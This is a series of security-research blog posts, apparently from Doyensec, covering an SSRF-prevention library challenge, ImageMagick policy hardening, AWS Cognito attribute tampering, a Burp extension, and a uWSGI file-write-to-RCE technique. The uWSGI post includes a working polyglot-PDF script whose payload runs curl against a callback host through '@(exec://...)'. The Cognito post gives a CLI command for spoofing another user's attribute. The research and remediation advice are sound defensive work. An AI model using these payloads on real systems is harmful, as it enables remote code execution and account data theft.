// If Control is not nil, it is called after creating the network
// connection but before actually dialing.
Control func(network, address string, c syscall.RawConn) error

In our safeurl implementation, the IPs validation happens inside the Control hook. The following snippet shows some of the checks being performed. If all of them pass, the HTTP dial occurs. In case a check fails, the HTTP request is dropped.

func buildRunFunc(wc *WrappedClient) func(network, address string, c syscall.RawConn) error {

return func(network, address string, _ syscall.RawConn) error {
	// [...]
	if wc.config.AllowedIPs == nil && isIPBlocked(ip, wc.config.BlockedIPs) {
		wc.log(fmt.Sprintf("ip: %v found in blocklist", ip))
		return &AllowedIPError{ip: ip.String()}
	}

	if !isIPAllowed(ip, wc.config.AllowedIPs) && isIPBlocked(ip, wc.config.BlockedIPs) {
		wc.log(fmt.Sprintf("ip: %v not found in allowlist", ip))
		return &AllowedIPError{ip: ip.String()}
	}

	return nil
}
}

Help Us Make safeurl Better (and Safer)

We’ve performed extensive testing during the library development. However, we would love to have others pick at our implementation.

“Given enough eyes, all bugs are shallow”. Hopefully.

Connect to http://164.92.85.153/ and attempt to catch the flag hosted on this internal (and unauthorized) URL: http://164.92.85.153/flag

The challenge was shut down on 01/13/2023. You can always run the challenge locally, by using the code snippet below.

This is the source code of the challenge endpoint, with the specific safeurl configuration:

func main() {
	cfg := safeurl.GetConfigBuilder().
		SetBlockedIPs("164.92.85.153").
		SetAllowedPorts(80, 443).
		Build()

	client := safeurl.Client(cfg)

	router := gin.Default()

	router.GET("/webhook", func(context *gin.Context) {
		urlFromUser := context.Query("url")
		if urlFromUser == "" {
			errorMessage := "Please provide an url. Example: /webhook?url=your-url.com\n"
			context.String(http.StatusBadRequest, errorMessage)
		} else {
			stringResponseMessage := "The server is checking the url: " + urlFromUser + "\n"

			resp, err := client.Get(urlFromUser)

			if err != nil {
				stringError := fmt.Errorf("request return error: %v", err)
				fmt.Print(stringError)
				context.String(http.StatusBadRequest, err.Error())
				return
			}

			defer resp.Body.Close()
			bodyString, err := io.ReadAll(resp.Body)

			if err != nil {
				context.String(http.StatusInternalServerError, err.Error())
				return
			}

			fmt.Print("Response from the server: " + stringResponseMessage)
			fmt.Print(resp)
			context.String(http.StatusOK, string(bodyString))
		}
	})

	router.GET("/flag", func(context *gin.Context) {
		ip := context.RemoteIP()
		nip := net.ParseIP(ip)
		if nip != nil {
			if nip.IsLoopback() {
				context.String(http.StatusOK, "You found the flag")
			} else {
				context.String(http.StatusForbidden, "")
			}
		} else {
			context.String(http.StatusInternalServerError, "")
		}
	})

	router.GET("/", func(context *gin.Context) {

		indexPage := "<!DOCTYPE html><html lang=\"en\"><head><title>SafeURL - challenge</title></head><body>...</body></html>"
		context.Writer.Header().Set("Content-Type", "text/html; charset=UTF-8")
		context.String(http.StatusOK, indexPage)
	})

	router.Run("127.0.0.1:8080")
}


If you are able to bypass the check enforced by the safeurl.Client, the content of the flag will give you further instructions on how to collect your reward. Please note that unintended ways of getting the flag (e.g., not bypassing safeurl.Client) are considered out of scope.

Feel free to contribute with pull requests, bug reports or enhancements ideas.

This tool was possible thanks to the 25% research time at Doyensec. Tune in again for new episodes.

ImageMagick Security Policy Evaluator

9 January 2023 at 23:00

During our audits we occasionally stumble across ImageMagick security policy configuration files (policy.xml), useful for limiting the default behavior and the resources consumed by the library. In the wild, these files often contain a plethora of recommendations cargo cultured from around the internet. This normally happens for two reasons:

  • Its options are only generally described on the online documentation page of the library, with no clear breakdown of what each security directive allowed by the policy is regulating. While the architectural complexity and the granularity of options definable by the policy are the major obstacles for a newbie, the corresponding knowledge base could be more welcoming. By default, ImageMagick comes with an unrestricted policy that must be tuned by the developers depending on their use. According to the docs, “this affords maximum utility for ImageMagick installations that run in a sandboxed environment, perhaps in a Docker instance, or behind a firewall where security risks are greatly diminished as compared to a public website.” A secure strict policy is also made available, however as noted in the past not always is well configured.
  • ImageMagick supports over 100 major file formats (not including sub-formats) types of image formats. The infamous vulnerabilities affecting the library over the years produced a number of urgent security fixes and workarounds involving the addition of policy items excluding the affected formats and features (ImageTragick in 2016, @taviso’s RCE via GhostScript in 2018, @insertScript’s shell injection via PDF password in 2020, @alexisdanizan’s in 2021).

Towards safer policies

With this in mind, we decided to study the effects of all the options accepted by ImageMagick’s security policy parser and write a tool to assist both the developers and the security teams in designing and auditing these files. Because of the number of available options and the need to explicitly deny all insecure settings, this is usually a manual task, which may not identify subtle bypasses which undermine the strength of a policy. It’s also easy to set policies that appear to work, but offer no real security benefit. The tool’s checks are based on our research aimed at helping developers to harden their policies and improve the security of their applications, to make sure policies provide a meaningful security benefit and cannot be subverted by attackers.

The tool can be found at imagemagick-secevaluator.doyensec.com/.

Allowlist vs Denylist approach

A number of seemingly secure policies can be found online, specifying a list of insecure coders similar to:

  ...
  <policy domain="coder" rights="none" pattern="EPHEMERAL" />
  <policy domain="coder" rights="none" pattern="EPI" />
  <policy domain="coder" rights="none" pattern="EPS" />
  <policy domain="coder" rights="none" pattern="MSL" />
  <policy domain="coder" rights="none" pattern="MVG" />
  <policy domain="coder" rights="none" pattern="PDF" />
  <policy domain="coder" rights="none" pattern="PLT" />
  <policy domain="coder" rights="none" pattern="PS" />
  <policy domain="coder" rights="none" pattern="PS2" />
  <policy domain="coder" rights="none" pattern="PS3" />
  <policy domain="coder" rights="none" pattern="SHOW" />
  <policy domain="coder" rights="none" pattern="TEXT" />
  <policy domain="coder" rights="none" pattern="WIN" />
  <policy domain="coder" rights="none" pattern="XPS" />
  ...

In ImageMagick 6.9.7-7, an unlisted change was pushed. The policy parser changed behavior from disallowing the use of a coder if there was at least one none-permission rule in the policy to respecting the last matching rule in the policy for the coder. This means that it is possible to adopt an allowlist approach in modern policies, first denying all coders rights and enabling the vetted ones. A more secure policy would specify:

  ...
  <policy domain="delegate" rights="none" pattern="*" />
  <policy domain="coder" rights="none" pattern="*" />
  <policy domain="coder" rights="read | write" pattern="{GIF,JPEG,PNG,WEBP}" />
  ...

Case sensitivity

Consider the following directive:

  ...
  <policy domain="coder" rights="none" pattern="ephemeral,epi,eps,msl,mvg,pdf,plt,ps,ps2,ps3,show,text,win,xps" />
  ...

With this, conversions will still be allowed, since policy patterns are case sensitive. Coders and modules must always be upper-case in the policy (e.g. “EPS” not “eps”).

Resource limits

Denial of service in ImageMagick is quite easy to achieve. To get a fresh set of payloads it’s convenient to search “oom” or similar keywords in the recently opened issues reported on the Github repository of the library. This is an issue since an ImageMagick instance accepting potentially malicious inputs (which is often the case) will always be prone to be exploited. Because of this, the tool also reports if reasonable limits are not explicitly set by the policy.

Policy fragmentation

Once a policy is defined, it’s important to make sure that the policy file is taking effect. ImageMagick packages bundled with the distribution or installed as dependencies through multiple package managers may specify different policies that interfere with each other. A quick find on your local machine will identify multiple occurrences of policy.xml files:

$ find / -iname policy.xml

# Example output on macOS
/usr/local/etc/ImageMagick-7/policy.xml
/usr/local/Cellar/imagemagick@6/6.9.12-60/etc/ImageMagick-6/policy.xml
/usr/local/Cellar/imagemagick@6/6.9.12-60/share/doc/ImageMagick-6/www/source/policy.xml
/usr/local/Cellar/imagemagick/7.1.0-45/etc/ImageMagick-7/policy.xml
/usr/local/Cellar/imagemagick/7.1.0-45/share/doc/ImageMagick-7/www/source/policy.xml

# Example output on Ubuntu
/usr/local/etc/ImageMagick-7/policy.xml
/usr/local/share/doc/ImageMagick-7/www/source/policy.xml
/opt/ImageMagick-7.0.11-5/config/policy.xml
/opt/ImageMagick-7.0.11-5/www/source/policy.xml

Policies can also be configured using the -limit CLI argument, MagickCore API methods, or with environment variables.

A starter, restrictive policy

Starting from the most restrictive policy described in the official documentation, we designed a restrictive policy gathering all our observations:

<policymap xmlns="">
  <policy domain="resource" name="temporary-path" value="/mnt/magick-conversions-with-restrictive-permissions"/> <!-- the location should only be accessible to the low-privileged user running ImageMagick -->
  <policy domain="resource" name="memory" value="256MiB"/>
  <policy domain="resource" name="list-length" value="32"/>
  <policy domain="resource" name="width" value="8KP"/>
  <policy domain="resource" name="height" value="8KP"/>
  <policy domain="resource" name="map" value="512MiB"/>
  <policy domain="resource" name="area" value="16KP"/>
  <policy domain="resource" name="disk" value="1GiB"/>
  <policy domain="resource" name="file" value="768"/>
  <policy domain="resource" name="thread" value="2"/>
  <policy domain="resource" name="time" value="10"/>
  <policy domain="module" rights="none" pattern="*" /> 
  <policy domain="delegate" rights="none" pattern="*" />
  <policy domain="coder" rights="none" pattern="*" /> 
  <policy domain="coder" rights="write" pattern="{PNG,JPG,JPEG}" /> <!-- your restricted set of acceptable formats, set your rights needs -->
  <policy domain="filter" rights="none" pattern="*" />
  <policy domain="path" rights="none" pattern="@*"/>
  <policy domain="cache" name="memory-map" value="anonymous"/>
  <policy domain="cache" name="synchronize" value="true"/>
  <!-- <policy domain="cache" name="shared-secret" value="my-secret-passphrase" stealth="True"/> Only needed for distributed pixel cache spanning multiple servers -->
  <policy domain="system" name="shred" value="2"/>
  <policy domain="system" name="max-memory-request" value="256MiB"/>
  <policy domain="resource" name="throttle" value="1"/> <!-- Periodically yield the CPU for at least the time specified in ms -->
  <policy xmlns="" domain="system" name="precision" value="6"/>
</policymap>

You can verify that a security policy is active using the identify command:

identify -list policy
Path: ImageMagick/policy.xml
...

You can also play with the above policy using our evaluator tool while developing a tailored one.

Tampering User Attributes In AWS Cognito User Pools

23 January 2023 at 23:00

CloudsecTidbit

From The Previous Episode… Did you solve the CloudSecTidbit Ep. 1 IaC lab?

Solution

The challenge for the data-import CloudSecTidbit is basically reading the content of an internal bucket. The frontend web application is using the targeted bucket to store the logo of the app.

The name of the bucket is returned to the client by calling the /variable endpoint:

$.ajax({
    type: 'GET',
    url: '/variable',
    dataType: 'json',
    success: function (data) {
        let source_internal = `https://${data}.s3.amazonaws.com/public-stuff/logo.png?${Math.random()}`;
        $(".logo_image").attr("src", source_internal);
    },
    error: function (jqXHR, status, err) {
        alert("Error getting variable name");
    }
});

The server will return something like:

"data-internal-private-20220705153355922300000001"

So the schema should be clear now. Let’s use the data import functionality and try to leak the content of the data-internal-private S3 bucket:

Extracting data from the internal S3 bucket

Then, by visiting the Data Gallery section, you will see the keys.txt and dummy.txt objects, which are stored within the internal bucket.

Tidbit No. 2 - Tampering User Attributes In AWS Cognito User Pools

Amazon Web Services offer a complete solution to add user sign-up, sign-in, and access control to web and mobile applications: Cognito. Let’s first talk about the service in general terms.

From AWS Cognito’s welcome page:

“Using the Amazon Cognito user pools API, you can create a user pool to manage directories and users. You can authenticate a user to obtain tokens related to user identity and access policies.”

Amazon Cognito collects a user’s profile attributes into directories called pools that an application uses to handle all authentication related tasks.

Pool Types

The two main components of Amazon Cognito are:

  • User pools: Provide sign-up and sign-in options for app users along with attributes association for each user.
  • Identity pools: Provide the possibility to grant users access to other AWS services (e.g., DynamoDB or Amazon S3).

With a user pool, users can sign in to an app through Amazon Cognito, OAuth2, and SAML identity providers.

Each user has a profile that applications can access through the software development kit (SDK).

User Attributes

User attributes are pieces of information stored to characterize individual users, such as name, email address, and phone number. A new user pool has a set of default standard attributes. It is also possible to add custom attributes to satisfy custom needs.

App Clients & Authentication

An app is an entity within a user pool that has permission to call management operation APIs, such as those used for user registration, sign-in, and forgotten passwords.

In order to call the operation APIs, an app client ID and an optional client secret are needed. Multiple app integrations can be created for a single user pool, but typically, an app client corresponds to the platform of an app.

A user can be authenticated in different ways using Cognito, but the main options are:

  • Client-side authentication flow - Used in client-side apps to obtain a valid session token (JWT) directly from the pool;
  • Server-side authentication flow - Used in server-side app with the authenticated server-side API for Amazon Cognito user pools. The server-side app calls the AdminInitiateAuth API operation. This operation requires AWS credentials with permissions that include cognito-idp:AdminInitiateAuth and cognito-idp:AdminRespondToAuthChallenge. The operation returns the required authentication parameters.

In both the cases, the end-user should receive the resulting JSON Web Token.

After that first look at AWS SDK credentials, we can jump straight to the tidbit case.

Unrestricted User Attributes Write in AWS Cognito User Pool - The Third-party Users Mapping Case

For this case, we will focus on a vulnerability identified in a Web Platform that was using AWS Cognito.

The platform used Cognito to manage users and map them to their account in a third-party platform X_platform strictly interconnected with the provided service.

In particular, users were able to connect their X_platform account and allow the platform to fetch their data in X_platform for later use.

{
  "sub": "cf9..[REDACTED]",
  "device_key": "us-east-1_ab..[REDACTED]",
  "iss": "https://cognito-idp.us-east-1.amazonaws.com/us-east-1_..[REDACTED]",
  "client_id": "9..[REDACTED]",
  "origin_jti": "ab..[REDACTED]",
  "event_id": "d..[REDACTED]",
  "token_use": "access",
  "scope": "aws.cognito.signin.user.admin",
  "auth_time": [REDACTED],
  "exp": [REDACTED],
  "iat": [REDACTED],
  "jti": "3b..[REDACTED]",
  "username": "[REDACTED]"
}

In AWS Cognito, user tokens permit calls to all the User Pool APIs that can be hit using access tokens alone.

The permitted API definitions can be found here.

If the request syntax for the API call includes the parameter "AccessToken": "string", then it allows users to modify something on their own UserPool entry with the previously inspected JWT.

The above described design does not represent a vulnerability on its own, but having users able to edit their own User Attributes in the pool could lead to severe impacts if the backend is using them to apply internal platform logic.

The user associated data within the pool was fetched by using the AWS CLI:

$ aws cognito-idp get-user --region us-east-1--access-token eyJra..[REDACTED SESSION JWT]
{
    "Username": "[REDACTED]",
    "UserAttributes": [
        {
            "Name": "sub",
            "Value": "cf915…[REDACTED]"
        },
        {
            "Name": "email_verified",
            "Value": "true"
        },
        {
            "Name": "name",
            "Value": "[REDACTED]"
        },
        {
            "Name": "custom:X_platform_user_id",
            "Value": "[REDACTED ID]"
        },
        {
            "Name": "email",
            "Value": "[REDACTED]"
        }
    ]
}

The Simple Deduction

After finding the X_platform_user_id user pool attribute, it was clear that it was there for a specific purpose. In fact, the platform was fetching the attribute to use it as the primary key to query the associated refresh_token in an internal database.

Attempting to spoof the attribute was as simple as executing:

$ aws --region us-east-1 cognito-idp update-user-attributes --user-attributes "Name=custom:X_platform_user_id,Value=[ANOTHER REDACTED ID]" --access-token eyJra..[REDACTED SESSION JWT]

The attribute edit succeeded and the data from the other user started to flow into the attacker’s account. The platform trusted the attribute as immutable and used it to retrieve a refresh_token needed to fetch and show data from X_platform in the UI.

Point Of The Story - Default READ/WRITE Perms On User Attributes

In AWS Cognito, App Integrations (Clients) have default read/write permissions on User Attributes.

The following image shows the “Attribute read and write permissions” configuration for a new App Integration within a User Pool.

Consequently, authenticated users are able to edit their own attributes by using the access token (JWT) and AWS CLI.

In conclusion, it is very important to know about such behavior and set the permissions correctly during the pool creation. Depending on the platform logic, some attributes should be set as read-only to make them trustable by internal flows.

For cloud security auditors

While auditing cloud-driven web platforms, look for JWTs issued by AWS Cognito, then answer the following questions:

  • Which User Attributes are associated with the user pool?
  • Which ones are editable with the JWT directly via AWS CLI?
    • Among the editable ones, is the platform trusting such claims?
      • For what internal logic or functional flow?
      • How does editing affect the business logic?

For developers

Remove write permissions for every platform-critical user attribute within App Integration for the used Users Pool (AWS Cognito).

By removing it, users will not be able to perform attribute updates using their access tokens.

Updates will be possible only via admin actions such as the admin-update-user-attributes method, which requires AWS credentials.

+1 remediation tip: To avoid doing it by hand, apply the r/w config in your IaC and have the infrastructure correctly deployed. Terraform example:

resource "aws_cognito_user_pool" "my_pool" {
  name = "my_pool"
}

...

resource "aws_cognito_user_pool" "pool" {
  name = "pool"
}

resource "aws_cognito_user_pool_client" "client" {
  name = "client"

  user_pool_id = aws_cognito_user_pool.pool.id
  read_attributes = ["email"]
  write_attributes = ["email"]
}

The given Terraform example file will create a pool where the client will have only read/write permissions on the “email” attribute. In fact, if at least one attribute is specified either in the read_attributes or write_attributes lists, the default r/w policy will be ignored.

By doing so, it is possible to strictly specify the attributes with read/write permissions while implicitly denying them on the non-specified ones.

Please ensure to properly handle the email and phone number verification in Cognito context. Since they may contain unverified values, remember to apply the RequireAttributesVerifiedBeforeUpdate parameter.

Hands-On IaC Lab

As promised in the series’ introduction, we developed a Terraform (IaC) laboratory to deploy a vulnerable dummy application and play with the vulnerability: https://github.com/doyensec/cloudsec-tidbits/

Stay tuned for the next episode!

Resources

Introducing Proxy Enriched Sequence Diagrams (PESD)

13 February 2023 at 23:00

PESD Exporter is now public!

We are releasing an internal tool to speed-up testing and reporting efforts in complex functional flows. We’re excited to announce that PESD Exporter is now available on Github.

pesdExporter

Modern web platforms design involves integrations with other applications and cloud services to add functionalities, share data and enrich the user experience. The resulting functional flows are characterized by multiple state-changing steps with complex trust boundaries and responsibility separation among the involved actors.

In such situations, web security specialists have to manually model sequence diagrams if they want to support their analysis with visualizations of the whole functionality logic.

We all know that constructing sequence diagrams by hand is tedious, error-prone, time-consuming and sometimes even impractical (dealing with more than ten messages in a single flow).

Proxy Enriched Sequence Diagrams (PESD) is our internal Burp Suite extension to visualize web traffic in a way that facilitates the analysis and reporting in scenarios with complex functional flows.

Meet The Format

A Proxy Enriched Sequence Diagram (PESD) is a specific message syntax for sequence diagram models adapted to bring enriched information about the represented HTTP traffic. The MermaidJS sequence diagram syntax is used to render the final diagram.

While classic sequence diagrams for software engineering are meant for an abstract visualization and all the information is carried by the diagram itself. PESD is designed to include granular information related to the underlying HTTP traffic being represented in the form of metadata.

The Enriched part in the format name originates from the diagram-metadata linkability. In fact, the HTTP events in the diagram are marked with flags that can be used to access the specific information from the metadata.

As an example, URL query parameters will be found in the arrow events as UrlParams expandable with a click.

pesdExporter

Some key characteristics of the format :

  • visual-analysis, especially useful for complex application flows in multi-actor scenarios where the listed proxy-view is not suited to visualize the abstract logic
  • tester-specific syntax to facilitate the analysis and overall readability
  • parsed metadata from the web traffic to enable further automation of the analysis
  • usable for reporting purposes like documentation of current implementations or Proof Of Concept diagrams

PESD Exporter - Burp Suite Extension

The extension handles Burp Suite traffic conversion to the PESD format and offers the possibility of executing templates that will enrich the resulting exports.

pesdExporter

Once loaded, sending items to the extension will directly result in a export with all the active settings.

Currently, two modes of operation are supported:

  • Domains as Actors - Each domain involved in the traffic is represented as an actor in the diagram. Suitable for multi-domain flows analysis

pesdExporter
  • Endpoints as Actors - Each endpoint (path) involved in the traffic is represented as an actor in the diagram. Suitable for single-domain flows analysis

pesdExporter

Export Capabilities

  • Expandable Metadata. Underlined flags can be clicked to show the underlying metadata from the traffic in a scrollable popover

  • Masked Randoms in URL Paths. UUIDs and pseudorandom strings recognized inside path segments are mapped to variable names <UUID_N> / <VAR_N>. The re-renderization will reshape the diagram to improve flow readability. Every occurrence with the same value maintains the same name

  • Notes. Comments from Burp Suite are converted to notes in the resulting diagram. Use <br> in Burp Suite comments to obtain multi-line notes in PESD exports

  • Save as :

    • Sequence Diagram in SVG format
    • Markdown file (MermaidJS syntax),
    • Traffic metadata in JSON format. Read about the metadata structure in the format definition page, “exports section”

Extending the diagram, syntax and metadata with Templates

PESD Exporter supports syntax and metadata extension via templates execution. Currently supported templates are:

  • OAuth2 / OpenID Connect The template matches standard OAuth2/OpenID Connect flows and adds related flags + flow frame

  • SAML SSO The template matches Single-Sign-On flows with SAML V2.0 and adds related flags + flow frame

Template matching example for SAML SP-initiated SSO with redirect POST:

pesdExporter

The template engine is also ensuring consistency in the case of crossing flows and bad implementations. The current check prevents nested flow-frames since they cannot be found in real-case scenarios. Nested or unclosed frames inside the resulting markdown are deleted and merged to allow MermaidJS renderization.

Note: Whenever the flow-frame is not displayed during an export involving the supported frameworks, a manual review is highly recommended. This behavior should be considered as a warning that the application is using a non-standard implementation.

Do you want to contribute by writing you own templates? Follow the template implementation guide.

Why PESD?

During Test Planning and Auditing

PESD exports allow visualizing the entirety of complex functionalities while still being able to access the core parts of its underlying logic. The role of each actor can be easily derived and used to build a test plan before diving in Burp Suite.

It can also be used to spot the differences with standard frameworks thanks to the HTTP messages syntax along with OAuth2/OpenID and SAML SSO templates.

In particular, templates enable the tester to identify uncommon implementations by matching standard flows in the resulting diagram. By doing so, custom variations can be spotted with a glance.

The following detailed examples are extracted from our testing activities:

  • SAML Response Double Spending. The SAML Response was sent two times and one of the submissions happened out of the flow frame

pesdExporter
  • OIDC with subsequent OAuth2. In this case, CLIENT.com was the SP in the first flow with Microsoft (OIDC), then it was the IdP in the second flow (OAuth2) with the tenant subdomain.

pesdExporter

During Reporting

The major benefit from the research output was the conjunction of the diagrams generated with PESD with the analysis of the vulnerability. The inclusion of PoC-specific exports in reports allows to describe the issue in a straightforward way.

The export enables the tester to refer to a request in the flow by specifying its ID in the diagram and link it in the description. The vulnerability description can be adapted to different testing approaches:

  • Black Box Testing - The description can refer to the interested sequence numbers in the flow along with the observed behavior and flaws;

  • White Box Testing - The description can refer directly to the endpoint’s handling function identified in the codebase. This result is particularly useful to help the reader in linking the code snippets with their position within the entire flow.

In that sense, PESD can positively affect the reporting style for vulnerabilities in complex functional flows.

The following basic example is extracted from one of our client engagements.

Report Example - Arbitrary User Access Via Unauthenticated Internal API Endpoint

An internal (Intranet) Web Application used by the super-admins allowed privileged users within the application to obtain temporary access to customers’ accounts in the web facing platform.

In order to restrict the access to the customers’ data, the support access must be granted by the tenant admin in the web-facing platform. In this way, the admins of the internal application had user access only to organizations via a valid grant.

The following sequence diagram represents the traffic intercepted during a user impersonation access in the internal application:

pesdExporter

The handling function of the first request (1) checked the presence of an access grant for the requested user’s tenant. If there were valid grants, it returned the redirection URL for an internal API defined in AWS’s API Gateway. The API was exposed only within the internal network accessible via VPN.

The second request (3) pointed to the AWS’s API Gateway. The endpoint was handled with an AWS Lambda function taking as input the URL parameters containing : tenantId, user_id, and others. The returned output contained the authentication details for the requested impersonation session: access_token, refresh_token and user_id. It should be noted that the internal API Gateway endpoint did not enforce authentication and authorization of the caller.

In the third request (5), the authentication details obtained are submitted to the web-facing.platform.com and the session is set. After this step, the internal admin user is authenticated in the web-facing platform as the specified target user.

Within the described flow, the authentication and authorization checks (handling of request 1) were decoupled from the actual creation of the impersonated session (handling of request 3).

As a result, any employee with access to the internal network (VPN) was able to invoke the internal AWS API responsible for issuing impersonated sessions and obtain access to any user in the web facing platform. By doing so, the need of a valid super-admin access to the internal application (authentication) and a specific target-user access grant (authorization) were bypassed.

Stay tuned!

Updates are coming. We are looking forward to receiving new improvement ideas to enrich PESD even further.

Feel free to contribute with pull requests, bug reports or enhancements.

This project was made with love in the Doyensec Research island by Francesco Lacerenza . The extension was developed during his internship with 50% research time.

A New Vector For “Dirty” Arbitrary File Write to RCE

27 February 2023 at 23:00

pesdExporter

Arbitrary file write (AFW) vulnerabilities in web application uploads can be a powerful tool for an attacker, potentially allowing them to escalate their privileges and even achieve remote code execution (RCE) on the server. However, the specific tactics that can be used to achieve this escalation often depend on the specific scenario faced by the attacker. In the wild, there can be several scenarios that an attacker may encounter when attempting to escalate from AFW to RCE in web applications. These can generically be categorized as:

  • Control of the full file path or of the file name only: In this scenario, the attacker has the ability to control the full file path or the name of the uploaded file, but not its contents. Depending on the permissions applied to the target directory and on the target application, the impact may vary from Denial of Service to interfering with the application logic to bypass potential security-sensitive features.
  • Control of the file contents only: an attacker has control over the contents of the uploaded file but not over the file path. The impact can vary greatly in this case, due to numerous factors.
  • Full Arbitrary File Write: an attacker has control over both of the above. This often results in RCE using various methods.

A plethora of tactics have been used in the past to achieve RCE through AFW in moderately hardened environments (in applications running as unprivileged users):

  • Overwriting or adding files that will be processed by the application server:
    • Configuration files (e.g., .htaccess, .config, web.config, httpd.conf, __init__.py and .xml)
    • Source files being served from the root of the application (e.g., .php, .asp, .jsp files)
    • Temp files
    • Secrets or environmental files (e.g., venv)
    • Serialized session files
  • Manipulating procfs to execute arbitrary code
  • Overwriting or adding files used or invoked by the OS, or by other daemons in the system:
    • Crontab routines
    • Bash scripts
    • .bashrc, .bash-profile and .profile
    • authorized_keys and authorized_keys2 - to gain SSH access
    • Abusing supervisors’ eager reloading of assets

It’s important to note that only a very small set of these tactics can be used in cases of partial control over the file contents in web applications (e.g., PHP, ASP or temp files). The specific methods used will depend on the specific application and server configuration, so it is important to understand the unique vulnerabilities and attack vectors that are present in the victims’ systems.

The following write-up illustrates a real-world chain of distinct vulnerabilities to obtain arbitrary command execution during one of our engagements, which resulted in the discovery of a new method. This is particularly useful in case an attacker has only partial control over the injected file contents (“dirty write”) or when server-side transformations are performed on its contents.

An example of a “dirty” arbitrary file write

In our scenario, the application had a vulnerable endpoint, through which, an attacker was able to perform a Path Traversal and write/delete files via a PDF export feature. Its associated function was responsible for:

  1. Reading an existing PDF template file and its stream
  2. Combining the PDF template and the new attacker-provided contents
  3. Saving the results in a PDF file named by the attacker

The attack was limited since it could only impact the files with the correct permissions for the application user, with all of the application files being read-only. While an attacker could already use the vulnerability to first delete the logs or on-file databases, no higher impact was possible at first glance. By looking at the directory, the following file was also available:

    drwxrwxr-x  6 root   root     4096 Nov 18 13:48 .
    -rw-rw-r-- 1 webuser webuser 373 Nov 18 13:46 /app/console/uwsgi-sockets.ini

uWSGI Lax Parsing of Configuration Files

The victim’s application was deployed through a uWSGI application server (v2.0.15) fronting the Flask-based application, acting as a process manager and monitor. uWSGI can be configured using several different methods, supporting loading configuration files via simple disk files (.ini). The uWSGI native function responsible for parsing these files is defined in core/ini.c:128 . The configuration file is initially read in full into memory and scanned to locate the string indicating the start of a valid uWSGI configuration (“[uwsgi]”):

	while (len) {
		ini_line = ini_get_line(ini, len);
		if (ini_line == NULL) {
			break;
		}
		lines++;

		// skip empty line
		key = ini_lstrip(ini);
		ini_rstrip(key);
		if (key[0] != 0) {
			if (key[0] == '[') {
				section = key + 1;
				section[strlen(section) - 1] = 0;
			}
			else if (key[0] == ';' || key[0] == '#') {
				// this is a comment
			}
			else {
				// val is always valid, but (obviously) can be ignored
				val = ini_get_key(key);

				if (!strcmp(section, section_asked)) {
					got_section = 1;
					ini_rstrip(key);
					val = ini_lstrip(val);
					ini_rstrip(val);
					add_exported_option((char *) key, val, 0);
				}
			}
		}

		len -= (ini_line - ini);
		ini += (ini_line - ini);

	}

More importantly, uWSGI configuration files can also include “magic” variables, placeholders and operators defined with a precise syntax. The ‘@’ operator in particular is used in the form of @(filename) to include the contents of a file. Many uWSGI schemes are supported, including “exec” - useful to read from a process’s standard output. These operators can be weaponized for Remote Command Execution or Arbitrary File Write/Read when a .ini configuration file is parsed:

    [uwsgi]
    ; read from a symbol
    foo = @(sym://uwsgi_funny_function)
    ; read from binary appended data
    bar = @(data://0)
    ; read from http
    test = @(http://doyensec.com/hello)
    ; read from a file descriptor
    content = @(fd://3)
    ; read from a process stdout
    body = @(exec://whoami)
    ; call a function returning a char *
    characters = @(call://uwsgi_func)

uWSGI Auto Reload Configuration

While abusing the above .ini files is a good vector, an attacker would still need a way to reload it (such as triggering a restart of the service via a second DoS bug or waiting the server to restart). In order to help with this, a standard uWSGI deployment configuration flag could ease the exploitation of the bug. In certain cases, the uWSGI configuration can specify a py-auto-reload development option, for which the Python modules are monitored within a user-determined time span (3 seconds in this case), specified as an argument. If a change is detected, it will trigger a reload, e.g.:

    [uwsgi]
    home = /app
    uid = webapp
    gid = webapp
    chdir = /app/console
    socket = 127.0.0.1:8001
    wsgi-file = /app/console/uwsgi-sockets.py
    gevent = 500
    logto = /var/log/uwsgi/%n.log
    harakiri = 30
    vacuum = True
    py-auto-reload = 3
    callable = app
    pidfile = /var/run/uwsgi-sockets-console.pid
    log-maxsize = 100000000
    log-backupname = /var/log/uwsgi/uwsgi-sockets.log.bak

In this scenario, directly writing malicious Python code inside the PDF won’t work, since the Python interpreter will fail when encountering the PDF’s binary data. On the other hand, overwriting a .py file with any data will trigger the uWSGI configuration file to be reloaded.

Putting it all together

In our PDF-exporting scenario, we had to craft a polymorphic, syntactically valid PDF file containing our valid multi-lined .ini configuration file. The .ini payload had to be kept during the merging with the PDF template. We were able to embed the multiline .ini payload inside the EXIF metadata of an image included in the PDF. To build this polyglot file we used the following script:

    from fpdf import FPDF
    from exiftool import ExifToolHelper

    with ExifToolHelper() as et:
        et.set_tags(
            ["doyensec.jpg"],
            tags={"model": "&#x0a;[uwsgi]&#x0a;foo = @(exec://curl http://collaborator-unique-host.oastify.com)&#x0a;"},
            params=["-E", "-overwrite_original"]
        )

    class MyFPDF(FPDF):
        pass

    pdf = MyFPDF()

    pdf.add_page()
    pdf.image('./doyensec.jpg')
    pdf.output('payload.pdf', 'F')

This metadata will be part of the file written on the server. In our exploitation, the eager loading of uWSGI picked up the new configuration and executed our curl payload. The payload can be tested locally with the following command:

    uwsgi --ini payload.pdf

Let’s exploit it on the web server with the following steps:

  1. Upload payload.pdf into /app/console/uwsgi-sockets.ini
  2. Wait for server to restart or force the uWSGI reload by overwriting any .py
  3. Verify the callback made by curl on Burp collaborator

Conclusions

As highlighted in this article, we introduced a new uWSGI-based technique. It comes in addition to the tactics already used in various scenarios by attackers to escalate from arbitrary file write (AFW) vulnerabilities in web application uploads to remote code execution (RCE). These techniques are constantly evolving with the server technologies, and new methods will surely be popularized in the future. This is why it is important to share the known escalation vectors with the research community. We encourage researchers to continue sharing information on known vectors, and to continue searching for new, less popular vectors.

SSRF Cross Protocol Redirect Bypass

15 March 2023 at 23:00

Server Side Request Forgery (SSRF) is a fairly known vulnerability with established prevention methods. So imagine my surprise when I bypassed an SSRF mitigation during a routine retest. Even worse, I have bypassed a filter that we have recommended ourselves! I couldn’t let it slip and had to get to the bottom of the issue.

Introduction

Server Side Request Forgery is a vulnerability in which a malicious actor exploits a victim server to perform HTTP(S) requests on the attacker’s behalf. Since the server usually has access to the internal network, this attack is useful to bypass firewalls and IP whitelists to access hosts otherwise inaccessible to the attacker.

Request Library Vulnerability

SSRF attacks can be prevented with address filtering, assuming there are no filter bypasses. One of the classic SSRF filtering bypass techniques is a redirection attack. In these attacks, an attacker sets up a malicious webserver serving an endpoint redirecting to an internal address. The victim server properly allows sending a request to an external server, but then blindly follows a malicious redirection to an internal service.

None of above is new, of course. All of these techniques have been around for years and any reputable anti-SSRF library mitigates such risks. And yet, I have bypassed it.

